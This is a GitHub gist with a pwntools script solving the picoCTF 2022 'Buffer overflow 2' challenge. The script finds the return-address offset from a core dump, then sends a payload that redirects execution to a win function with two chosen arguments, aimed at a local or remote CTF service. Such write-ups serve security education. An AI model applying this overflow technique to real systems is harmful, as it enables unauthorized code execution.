Skip to content

Instantly share code, notes, and snippets.

@jktrn

jktrn/buffer-overflow-2.py

Last active June 17, 2022 04:56
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jktrn/c6c17fc63ca801d0b64d8bb5acc982c1 to your computer and use it in GitHub Desktop.
Save jktrn/c6c17fc63ca801d0b64d8bb5acc982c1 to your computer and use it in GitHub Desktop.
Download ZIP
Solve for the pwn/binary challenge "Buffer overflow 2" from the picoCTF 2022 competition.
Raw
buffer-overflow-2.py
from pwn import *
elf = context.binary = ELF('./vuln') # sets context + elf object
host, port = 'saturn.picoctf.net', [PORT]
p = process(elf.path) # creates local process w/ elf object
p.sendline(cyclic(128)) # sends cyclic pattern to crash
p.wait() # sigsegv generates core dump
core = Coredump('./core') # parses core dump file
payload = flat([
{cyclic_find(core.eip): elf.symbols.win}, # pads win address
elf.symbols.main, # return address
0xCAFEF00D, # parameter 1
0xF00DF00D # parameter 2
])
if args.REMOTE:
p = remote(host, port)
else:
p = process(elf.path)
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment